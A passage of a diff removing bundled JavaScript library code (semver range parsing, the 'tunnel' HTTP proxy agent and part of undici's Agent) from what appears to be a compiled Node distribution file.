comps.join(' ').trim() - }).join('||').trim() - return this.range -} - -Range.prototype.toString = function () { - return this.range -} - -Range.prototype.parseRange = function (range) { - var loose = this.options.loose - // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` - var hr = loose ? 
safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] - range = range.replace(hr, hyphenReplace) - debug('hyphen replace', range) - // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` - range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) - debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) - - // `~ 1.2.3` => `~1.2.3` - range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) - - // `^ 1.2.3` => `^1.2.3` - range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) - - // normalize spaces - range = range.split(/\s+/).join(' ') - - // At this point, the range is completely trimmed and - // ready to be split into comparators. - - var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] - var set = range.split(' ').map(function (comp) { - return parseComparator(comp, this.options) - }, this).join(' ').split(/\s+/) - if (this.options.loose) { - // in loose mode, throw out any that are not valid comparators - set = set.filter(function (comp) { - return !!comp.match(compRe) - }) - } - set = set.map(function (comp) { - return new Comparator(comp, this.options) - }, this) - - return set -} - -Range.prototype.intersects = function (range, options) { - if (!(range instanceof Range)) { - throw new TypeError('a Range is required') - } - - return this.set.some(function (thisComparators) { - return ( - isSatisfiable(thisComparators, options) && - range.set.some(function (rangeComparators) { - return ( - isSatisfiable(rangeComparators, options) && - thisComparators.every(function (thisComparator) { - return rangeComparators.every(function (rangeComparator) { - return thisComparator.intersects(rangeComparator, options) - }) - }) - ) - }) - ) - }) -} - -// take a set of comparators and determine whether there -// exists a version which can satisfy it -function isSatisfiable (comparators, options) { - var result = true - var remainingComparators = comparators.slice() - var testComparator = remainingComparators.pop() - - while (result && 
remainingComparators.length) { - result = remainingComparators.every(function (otherComparator) { - return testComparator.intersects(otherComparator, options) - }) - - testComparator = remainingComparators.pop() - } - - return result -} - -// Mostly just for testing and legacy API reasons -exports.toComparators = toComparators -function toComparators (range, options) { - return new Range(range, options).set.map(function (comp) { - return comp.map(function (c) { - return c.value - }).join(' ').trim().split(' ') - }) -} - -// comprised of xranges, tildes, stars, and gtlt's at this point. -// already replaced the hyphen ranges -// turn into a set of JUST comparators. -function parseComparator (comp, options) { - debug('comp', comp, options) - comp = replaceCarets(comp, options) - debug('caret', comp) - comp = replaceTildes(comp, options) - debug('tildes', comp) - comp = replaceXRanges(comp, options) - debug('xrange', comp) - comp = replaceStars(comp, options) - debug('stars', comp) - return comp -} - -function isX (id) { - return !id || id.toLowerCase() === 'x' || id === '*' -} - -// ~, ~> --> * (any, kinda silly) -// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 -// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 -// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 -// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 -// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 -function replaceTildes (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceTilde(comp, options) - }).join(' ') -} - -function replaceTilde (comp, options) { - var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] - return comp.replace(r, function (_, M, m, p, pr) { - debug('tilde', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - // ~1.2 == >=1.2.0 <1.3.0 - ret = '>=' + M + '.' + m + '.0 <' + M + '.' 
+ (+m + 1) + '.0' - } else if (pr) { - debug('replaceTilde pr', pr) - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } else { - // ~1.2.3 == >=1.2.3 <1.3.0 - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - - debug('tilde return', ret) - return ret - }) -} - -// ^ --> * (any, kinda silly) -// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 -// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 -// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 -// ^1.2.3 --> >=1.2.3 <2.0.0 -// ^1.2.0 --> >=1.2.0 <2.0.0 -function replaceCarets (comp, options) { - return comp.trim().split(/\s+/).map(function (comp) { - return replaceCaret(comp, options) - }).join(' ') -} - -function replaceCaret (comp, options) { - debug('caret', comp, options) - var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] - return comp.replace(r, function (_, M, m, p, pr) { - debug('caret', comp, _, M, m, p, pr) - var ret - - if (isX(M)) { - ret = '' - } else if (isX(m)) { - ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' - } else if (isX(p)) { - if (M === '0') { - ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' - } else { - ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' - } - } else if (pr) { - debug('replaceCaret pr', pr) - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' + p + '-' + pr + - ' <' + (+M + 1) + '.0.0' - } - } else { - debug('no pr') - if (M === '0') { - if (m === '0') { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + m + '.' + (+p + 1) - } else { - ret = '>=' + M + '.' + m + '.' + p + - ' <' + M + '.' + (+m + 1) + '.0' - } - } else { - ret = '>=' + M + '.' + m + '.' 
+ p + - ' <' + (+M + 1) + '.0.0' - } - } - - debug('caret return', ret) - return ret - }) -} - -function replaceXRanges (comp, options) { - debug('replaceXRanges', comp, options) - return comp.split(/\s+/).map(function (comp) { - return replaceXRange(comp, options) - }).join(' ') -} - -function replaceXRange (comp, options) { - comp = comp.trim() - var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] - return comp.replace(r, function (ret, gtlt, M, m, p, pr) { - debug('xRange', comp, ret, gtlt, M, m, p, pr) - var xM = isX(M) - var xm = xM || isX(m) - var xp = xm || isX(p) - var anyX = xp - - if (gtlt === '=' && anyX) { - gtlt = '' - } - - // if we're including prereleases in the match, then we need - // to fix this to -0, the lowest possible prerelease value - pr = options.includePrerelease ? '-0' : '' - - if (xM) { - if (gtlt === '>' || gtlt === '<') { - // nothing is allowed - ret = '<0.0.0-0' - } else { - // nothing is forbidden - ret = '*' - } - } else if (gtlt && anyX) { - // we know patch is an x, because we have any x at all. - // replace X with 0 - if (xm) { - m = 0 - } - p = 0 - - if (gtlt === '>') { - // >1 => >=2.0.0 - // >1.2 => >=1.3.0 - // >1.2.3 => >= 1.2.4 - gtlt = '>=' - if (xm) { - M = +M + 1 - m = 0 - p = 0 - } else { - m = +m + 1 - p = 0 - } - } else if (gtlt === '<=') { - // <=0.7.x is actually <0.8.0, since any 0.7.x should - // pass. Similarly, <=7.x is actually <8.0.0, etc. - gtlt = '<' - if (xm) { - M = +M + 1 - } else { - m = +m + 1 - } - } - - ret = gtlt + M + '.' + m + '.' + p + pr - } else if (xm) { - ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr - } else if (xp) { - ret = '>=' + M + '.' + m + '.0' + pr + - ' <' + M + '.' + (+m + 1) + '.0' + pr - } - - debug('xRange return', ret) - - return ret - }) -} - -// Because * is AND-ed with everything else in the comparator, -// and '' means "any version", just remove the *s entirely. 
-function replaceStars (comp, options) { - debug('replaceStars', comp, options) - // Looseness is ignored here. star is always as loose as it gets! - return comp.trim().replace(safeRe[t.STAR], '') -} - -// This function is passed to string.replace(re[t.HYPHENRANGE]) -// M, m, patch, prerelease, build -// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 -// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do -// 1.2 - 3.4 => >=1.2.0 <3.5.0 -function hyphenReplace ($0, - from, fM, fm, fp, fpr, fb, - to, tM, tm, tp, tpr, tb) { - if (isX(fM)) { - from = '' - } else if (isX(fm)) { - from = '>=' + fM + '.0.0' - } else if (isX(fp)) { - from = '>=' + fM + '.' + fm + '.0' - } else { - from = '>=' + from - } - - if (isX(tM)) { - to = '' - } else if (isX(tm)) { - to = '<' + (+tM + 1) + '.0.0' - } else if (isX(tp)) { - to = '<' + tM + '.' + (+tm + 1) + '.0' - } else if (tpr) { - to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr - } else { - to = '<=' + to - } - - return (from + ' ' + to).trim() -} - -// if ANY of the sets match ALL of its comparators, then pass -Range.prototype.test = function (version) { - if (!version) { - return false - } - - if (typeof version === 'string') { - try { - version = new SemVer(version, this.options) - } catch (er) { - return false - } - } - - for (var i = 0; i < this.set.length; i++) { - if (testSet(this.set[i], version, this.options)) { - return true - } - } - return false -} - -function testSet (set, version, options) { - for (var i = 0; i < set.length; i++) { - if (!set[i].test(version)) { - return false - } - } - - if (version.prerelease.length && !options.includePrerelease) { - // Find the set of versions that are allowed to have prereleases - // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 - // That should allow `1.2.3-pr.2` to pass. - // However, `1.2.4-alpha.notready` should NOT be allowed, - // even though it's within the range set by the comparators. 
- for (i = 0; i < set.length; i++) { - debug(set[i].semver) - if (set[i].semver === ANY) { - continue - } - - if (set[i].semver.prerelease.length > 0) { - var allowed = set[i].semver - if (allowed.major === version.major && - allowed.minor === version.minor && - allowed.patch === version.patch) { - return true - } - } - } - - // Version has a -pre, but it's not one of the ones we like. - return false - } - - return true -} - -exports.satisfies = satisfies -function satisfies (version, range, options) { - try { - range = new Range(range, options) - } catch (er) { - return false - } - return range.test(version) -} - -exports.maxSatisfying = maxSatisfying -function maxSatisfying (versions, range, options) { - var max = null - var maxSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!max || maxSV.compare(v) === -1) { - // compare(max, v, true) - max = v - maxSV = new SemVer(max, options) - } - } - }) - return max -} - -exports.minSatisfying = minSatisfying -function minSatisfying (versions, range, options) { - var min = null - var minSV = null - try { - var rangeObj = new Range(range, options) - } catch (er) { - return null - } - versions.forEach(function (v) { - if (rangeObj.test(v)) { - // satisfies(v, range, options) - if (!min || minSV.compare(v) === 1) { - // compare(min, v, true) - min = v - minSV = new SemVer(min, options) - } - } - }) - return min -} - -exports.minVersion = minVersion -function minVersion (range, loose) { - range = new Range(range, loose) - - var minver = new SemVer('0.0.0') - if (range.test(minver)) { - return minver - } - - minver = new SemVer('0.0.0-0') - if (range.test(minver)) { - return minver - } - - minver = null - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - comparators.forEach(function (comparator) { - // Clone to avoid manipulating the comparator's 
semver object. - var compver = new SemVer(comparator.semver.version) - switch (comparator.operator) { - case '>': - if (compver.prerelease.length === 0) { - compver.patch++ - } else { - compver.prerelease.push(0) - } - compver.raw = compver.format() - /* fallthrough */ - case '': - case '>=': - if (!minver || gt(minver, compver)) { - minver = compver - } - break - case '<': - case '<=': - /* Ignore maximum versions */ - break - /* istanbul ignore next */ - default: - throw new Error('Unexpected operation: ' + comparator.operator) - } - }) - } - - if (minver && range.test(minver)) { - return minver - } - - return null -} - -exports.validRange = validRange -function validRange (range, options) { - try { - // Return '*' instead of '' so that truthiness works. - // This will throw if it's invalid anyway - return new Range(range, options).range || '*' - } catch (er) { - return null - } -} - -// Determine if version is less than all the versions possible in the range -exports.ltr = ltr -function ltr (version, range, options) { - return outside(version, range, '<', options) -} - -// Determine if version is greater than all the versions possible in the range. -exports.gtr = gtr -function gtr (version, range, options) { - return outside(version, range, '>', options) -} - -exports.outside = outside -function outside (version, range, hilo, options) { - version = new SemVer(version, options) - range = new Range(range, options) - - var gtfn, ltefn, ltfn, comp, ecomp - switch (hilo) { - case '>': - gtfn = gt - ltefn = lte - ltfn = lt - comp = '>' - ecomp = '>=' - break - case '<': - gtfn = lt - ltefn = gte - ltfn = gt - comp = '<' - ecomp = '<=' - break - default: - throw new TypeError('Must provide a hilo val of "<" or ">"') - } - - // If it satisifes the range it is not outside - if (satisfies(version, range, options)) { - return false - } - - // From now on, variable terms are as if we're in "gtr" mode. - // but note that everything is flipped for the "ltr" function. 
- - for (var i = 0; i < range.set.length; ++i) { - var comparators = range.set[i] - - var high = null - var low = null - - comparators.forEach(function (comparator) { - if (comparator.semver === ANY) { - comparator = new Comparator('>=0.0.0') - } - high = high || comparator - low = low || comparator - if (gtfn(comparator.semver, high.semver, options)) { - high = comparator - } else if (ltfn(comparator.semver, low.semver, options)) { - low = comparator - } - }) - - // If the edge version comparator has a operator then our version - // isn't outside it - if (high.operator === comp || high.operator === ecomp) { - return false - } - - // If the lowest version comparator has an operator and our version - // is less than it then it isn't higher than the range - if ((!low.operator || low.operator === comp) && - ltefn(version, low.semver)) { - return false - } else if (low.operator === ecomp && ltfn(version, low.semver)) { - return false - } - } - return true -} - -exports.prerelease = prerelease -function prerelease (version, options) { - var parsed = parse(version, options) - return (parsed && parsed.prerelease.length) ? parsed.prerelease : null -} - -exports.intersects = intersects -function intersects (r1, r2, options) { - r1 = new Range(r1, options) - r2 = new Range(r2, options) - return r1.intersects(r2) -} - -exports.coerce = coerce -function coerce (version, options) { - if (version instanceof SemVer) { - return version - } - - if (typeof version === 'number') { - version = String(version) - } - - if (typeof version !== 'string') { - return null - } - - options = options || {} - - var match = null - if (!options.rtl) { - match = version.match(safeRe[t.COERCE]) - } else { - // Find the right-most coercible string that does not share - // a terminus with a more left-ward coercible string. 
- // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' - // - // Walk through the string checking with a /g regexp - // Manually set the index so as to pick up overlapping matches. - // Stop when we get a match that ends at the string end, since no - // coercible string can be more right-ward without the same terminus. - var next - while ((next = safeRe[t.COERCERTL].exec(version)) && - (!match || match.index + match[0].length !== version.length) - ) { - if (!match || - next.index + next[0].length !== match.index + match[0].length) { - match = next - } - safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length - } - // leave it in a clean state - safeRe[t.COERCERTL].lastIndex = -1 - } - - if (match === null) { - return null - } - - return parse(match[2] + - '.' + (match[3] || '0') + - '.' + (match[4] || '0'), options) -} - - -/***/ }), - -/***/ 4294: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -module.exports = __nccwpck_require__(4219); - - -/***/ }), - -/***/ 4219: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -var net = __nccwpck_require__(1808); -var tls = __nccwpck_require__(4404); -var http = __nccwpck_require__(3685); -var https = __nccwpck_require__(5687); -var events = __nccwpck_require__(2361); -var assert = __nccwpck_require__(9491); -var util = __nccwpck_require__(3837); - - -exports.httpOverHttp = httpOverHttp; -exports.httpsOverHttp = httpsOverHttp; -exports.httpOverHttps = httpOverHttps; -exports.httpsOverHttps = httpsOverHttps; - - -function httpOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - return agent; -} - -function httpsOverHttp(options) { - var agent = new TunnelingAgent(options); - agent.request = http.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - -function httpOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = 
https.request; - return agent; -} - -function httpsOverHttps(options) { - var agent = new TunnelingAgent(options); - agent.request = https.request; - agent.createSocket = createSecureSocket; - agent.defaultPort = 443; - return agent; -} - - -function TunnelingAgent(options) { - var self = this; - self.options = options || {}; - self.proxyOptions = self.options.proxy || {}; - self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; - self.requests = []; - self.sockets = []; - - self.on('free', function onFree(socket, host, port, localAddress) { - var options = toOptions(host, port, localAddress); - for (var i = 0, len = self.requests.length; i < len; ++i) { - var pending = self.requests[i]; - if (pending.host === options.host && pending.port === options.port) { - // Detect the request to connect same origin server, - // reuse the connection. - self.requests.splice(i, 1); - pending.request.onSocket(socket); - return; - } - } - socket.destroy(); - self.removeSocket(socket); - }); -} -util.inherits(TunnelingAgent, events.EventEmitter); - -TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { - var self = this; - var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); - - if (self.sockets.length >= this.maxSockets) { - // We are over limit so we'll add it to the queue. - self.requests.push(options); - return; - } - - // If we are under maxSockets create a new one. 
- self.createSocket(options, function(socket) { - socket.on('free', onFree); - socket.on('close', onCloseOrRemove); - socket.on('agentRemove', onCloseOrRemove); - req.onSocket(socket); - - function onFree() { - self.emit('free', socket, options); - } - - function onCloseOrRemove(err) { - self.removeSocket(socket); - socket.removeListener('free', onFree); - socket.removeListener('close', onCloseOrRemove); - socket.removeListener('agentRemove', onCloseOrRemove); - } - }); -}; - -TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { - var self = this; - var placeholder = {}; - self.sockets.push(placeholder); - - var connectOptions = mergeOptions({}, self.proxyOptions, { - method: 'CONNECT', - path: options.host + ':' + options.port, - agent: false, - headers: { - host: options.host + ':' + options.port - } - }); - if (options.localAddress) { - connectOptions.localAddress = options.localAddress; - } - if (connectOptions.proxyAuth) { - connectOptions.headers = connectOptions.headers || {}; - connectOptions.headers['Proxy-Authorization'] = 'Basic ' + - new Buffer(connectOptions.proxyAuth).toString('base64'); - } - - debug('making CONNECT request'); - var connectReq = self.request(connectOptions); - connectReq.useChunkedEncodingByDefault = false; // for v0.6 - connectReq.once('response', onResponse); // for v0.6 - connectReq.once('upgrade', onUpgrade); // for v0.6 - connectReq.once('connect', onConnect); // for v0.7 or later - connectReq.once('error', onError); - connectReq.end(); - - function onResponse(res) { - // Very hacky. This is necessary to avoid http-parser leaks. - res.upgrade = true; - } - - function onUpgrade(res, socket, head) { - // Hacky. 
- process.nextTick(function() { - onConnect(res, socket, head); - }); - } - - function onConnect(res, socket, head) { - connectReq.removeAllListeners(); - socket.removeAllListeners(); - - if (res.statusCode !== 200) { - debug('tunneling socket could not be established, statusCode=%d', - res.statusCode); - socket.destroy(); - var error = new Error('tunneling socket could not be established, ' + - 'statusCode=' + res.statusCode); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - if (head.length > 0) { - debug('got illegal response body from proxy'); - socket.destroy(); - var error = new Error('got illegal response body from proxy'); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - return; - } - debug('tunneling connection has established'); - self.sockets[self.sockets.indexOf(placeholder)] = socket; - return cb(socket); - } - - function onError(cause) { - connectReq.removeAllListeners(); - - debug('tunneling socket could not be established, cause=%s\n', - cause.message, cause.stack); - var error = new Error('tunneling socket could not be established, ' + - 'cause=' + cause.message); - error.code = 'ECONNRESET'; - options.request.emit('error', error); - self.removeSocket(placeholder); - } -}; - -TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { - var pos = this.sockets.indexOf(socket) - if (pos === -1) { - return; - } - this.sockets.splice(pos, 1); - - var pending = this.requests.shift(); - if (pending) { - // If we have pending requests and a socket gets closed a new one - // needs to be created to take over in the pool for the one that closed. 
- this.createSocket(pending, function(socket) { - pending.request.onSocket(socket); - }); - } -}; - -function createSecureSocket(options, cb) { - var self = this; - TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { - var hostHeader = options.request.getHeader('host'); - var tlsOptions = mergeOptions({}, self.options, { - socket: socket, - servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host - }); - - // 0 is dummy port for v0.6 - var secureSocket = tls.connect(0, tlsOptions); - self.sockets[self.sockets.indexOf(socket)] = secureSocket; - cb(secureSocket); - }); -} - - -function toOptions(host, port, localAddress) { - if (typeof host === 'string') { // since v0.10 - return { - host: host, - port: port, - localAddress: localAddress - }; - } - return host; // for v0.11 or later -} - -function mergeOptions(target) { - for (var i = 1, len = arguments.length; i < len; ++i) { - var overrides = arguments[i]; - if (typeof overrides === 'object') { - var keys = Object.keys(overrides); - for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { - var k = keys[j]; - if (overrides[k] !== undefined) { - target[k] = overrides[k]; - } - } - } - } - return target; -} - - -var debug; -if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { - debug = function() { - var args = Array.prototype.slice.call(arguments); - if (typeof args[0] === 'string') { - args[0] = 'TUNNEL: ' + args[0]; - } else { - args.unshift('TUNNEL:'); - } - console.error.apply(console, args); - } -} else { - debug = function() {}; -} -exports.debug = debug; // for test - - -/***/ }), - -/***/ 1773: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Client = __nccwpck_require__(3598) -const Dispatcher = __nccwpck_require__(412) -const errors = __nccwpck_require__(8045) -const Pool = __nccwpck_require__(4634) -const BalancedPool = __nccwpck_require__(7931) -const Agent = __nccwpck_require__(7890) -const util 
= __nccwpck_require__(3983) -const { InvalidArgumentError } = errors -const api = __nccwpck_require__(4059) -const buildConnector = __nccwpck_require__(2067) -const MockClient = __nccwpck_require__(8687) -const MockAgent = __nccwpck_require__(6771) -const MockPool = __nccwpck_require__(6193) -const mockErrors = __nccwpck_require__(888) -const ProxyAgent = __nccwpck_require__(7858) -const RetryHandler = __nccwpck_require__(2286) -const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) -const DecoratorHandler = __nccwpck_require__(6930) -const RedirectHandler = __nccwpck_require__(2860) -const createRedirectInterceptor = __nccwpck_require__(8861) - -let hasCrypto -try { - __nccwpck_require__(6113) - hasCrypto = true -} catch { - hasCrypto = false -} - -Object.assign(Dispatcher.prototype, api) - -module.exports.Dispatcher = Dispatcher -module.exports.Client = Client -module.exports.Pool = Pool -module.exports.BalancedPool = BalancedPool -module.exports.Agent = Agent -module.exports.ProxyAgent = ProxyAgent -module.exports.RetryHandler = RetryHandler - -module.exports.DecoratorHandler = DecoratorHandler -module.exports.RedirectHandler = RedirectHandler -module.exports.createRedirectInterceptor = createRedirectInterceptor - -module.exports.buildConnector = buildConnector -module.exports.errors = errors - -function makeDispatcher (fn) { - return (url, opts, handler) => { - if (typeof opts === 'function') { - handler = opts - opts = null - } - - if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { - throw new InvalidArgumentError('invalid url') - } - - if (opts != null && typeof opts !== 'object') { - throw new InvalidArgumentError('invalid opts') - } - - if (opts && opts.path != null) { - if (typeof opts.path !== 'string') { - throw new InvalidArgumentError('invalid opts.path') - } - - let path = opts.path - if (!opts.path.startsWith('/')) { - path = `/${path}` - } - - url = new 
URL(util.parseOrigin(url).origin + path) - } else { - if (!opts) { - opts = typeof url === 'object' ? url : {} - } - - url = util.parseURL(url) - } - - const { agent, dispatcher = getGlobalDispatcher() } = opts - - if (agent) { - throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') - } - - return fn.call(dispatcher, { - ...opts, - origin: url.origin, - path: url.search ? `${url.pathname}${url.search}` : url.pathname, - method: opts.method || (opts.body ? 'PUT' : 'GET') - }, handler) - } -} - -module.exports.setGlobalDispatcher = setGlobalDispatcher -module.exports.getGlobalDispatcher = getGlobalDispatcher - -if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { - let fetchImpl = null - module.exports.fetch = async function fetch (resource) { - if (!fetchImpl) { - fetchImpl = (__nccwpck_require__(4881).fetch) - } - - try { - return await fetchImpl(...arguments) - } catch (err) { - if (typeof err === 'object') { - Error.captureStackTrace(err, this) - } - - throw err - } - } - module.exports.Headers = __nccwpck_require__(554).Headers - module.exports.Response = __nccwpck_require__(7823).Response - module.exports.Request = __nccwpck_require__(8359).Request - module.exports.FormData = __nccwpck_require__(2015).FormData - module.exports.File = __nccwpck_require__(8511).File - module.exports.FileReader = __nccwpck_require__(1446).FileReader - - const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) - - module.exports.setGlobalOrigin = setGlobalOrigin - module.exports.getGlobalOrigin = getGlobalOrigin - - const { CacheStorage } = __nccwpck_require__(7907) - const { kConstruct } = __nccwpck_require__(9174) - - // Cache & CacheStorage are tightly coupled with fetch. Even if it may run - // in an older version of Node, it doesn't have any use without fetch. 
- module.exports.caches = new CacheStorage(kConstruct) -} - -if (util.nodeMajor >= 16) { - const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) - - module.exports.deleteCookie = deleteCookie - module.exports.getCookies = getCookies - module.exports.getSetCookies = getSetCookies - module.exports.setCookie = setCookie - - const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - - module.exports.parseMIMEType = parseMIMEType - module.exports.serializeAMimeType = serializeAMimeType -} - -if (util.nodeMajor >= 18 && hasCrypto) { - const { WebSocket } = __nccwpck_require__(4284) - - module.exports.WebSocket = WebSocket -} - -module.exports.request = makeDispatcher(api.request) -module.exports.stream = makeDispatcher(api.stream) -module.exports.pipeline = makeDispatcher(api.pipeline) -module.exports.connect = makeDispatcher(api.connect) -module.exports.upgrade = makeDispatcher(api.upgrade) - -module.exports.MockClient = MockClient -module.exports.MockPool = MockPool -module.exports.MockAgent = MockAgent -module.exports.mockErrors = mockErrors - - -/***/ }), - -/***/ 7890: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) -const DispatcherBase = __nccwpck_require__(4839) -const Pool = __nccwpck_require__(4634) -const Client = __nccwpck_require__(3598) -const util = __nccwpck_require__(3983) -const createRedirectInterceptor = __nccwpck_require__(8861) -const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() - -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kMaxRedirections = Symbol('maxRedirections') -const kOnDrain = Symbol('onDrain') -const kFactory = Symbol('factory') -const kFinalizer = Symbol('finalizer') 
-const kOptions = Symbol('options') - -function defaultFactory (origin, opts) { - return opts && opts.connections === 1 - ? new Client(origin, opts) - : new Pool(origin, opts) -} - -class Agent extends DispatcherBase { - constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { - super() - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { - throw new InvalidArgumentError('maxRedirections must be a positive number') - } - - if (connect && typeof connect !== 'function') { - connect = { ...connect } - } - - this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) - ? options.interceptors.Agent - : [createRedirectInterceptor({ maxRedirections })] - - this[kOptions] = { ...util.deepClone(options), connect } - this[kOptions].interceptors = options.interceptors - ? 
{ ...options.interceptors } - : undefined - this[kMaxRedirections] = maxRedirections - this[kFactory] = factory - this[kClients] = new Map() - this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { - const ref = this[kClients].get(key) - if (ref !== undefined && ref.deref() === undefined) { - this[kClients].delete(key) - } - }) - - const agent = this - - this[kOnDrain] = (origin, targets) => { - agent.emit('drain', origin, [agent, ...targets]) - } - - this[kOnConnect] = (origin, targets) => { - agent.emit('connect', origin, [agent, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - agent.emit('disconnect', origin, [agent, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - agent.emit('connectionError', origin, [agent, ...targets], err) - } - } - - get [kRunning] () { - let ret = 0 - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore next: gc is undeterministic */ - if (client) { - ret += client[kRunning] - } - } - return ret - } - - [kDispatch] (opts, handler) { - let key - if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { - key = String(opts.origin) - } else { - throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') - } - - const ref = this[kClients].get(key) - - let dispatcher = ref ? 
ref.deref() : null - if (!dispatcher) { - dispatcher = this[kFactory](opts.origin, this[kOptions]) - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].set(key, new WeakRef(dispatcher)) - this[kFinalizer].register(dispatcher, key) - } - - return dispatcher.dispatch(opts, handler) - } - - async [kClose] () { - const closePromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - closePromises.push(client.close()) - } - } - - await Promise.all(closePromises) - } - - async [kDestroy] (err) { - const destroyPromises = [] - for (const ref of this[kClients].values()) { - const client = ref.deref() - /* istanbul ignore else: gc is undeterministic */ - if (client) { - destroyPromises.push(client.destroy(err)) - } - } - - await Promise.all(destroyPromises) - } -} - -module.exports = Agent - - -/***/ }), - -/***/ 7032: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { addAbortListener } = __nccwpck_require__(3983) -const { RequestAbortedError } = __nccwpck_require__(8045) - -const kListener = Symbol('kListener') -const kSignal = Symbol('kSignal') - -function abort (self) { - if (self.abort) { - self.abort() - } else { - self.onError(new RequestAbortedError()) - } -} - -function addSignal (self, signal) { - self[kSignal] = 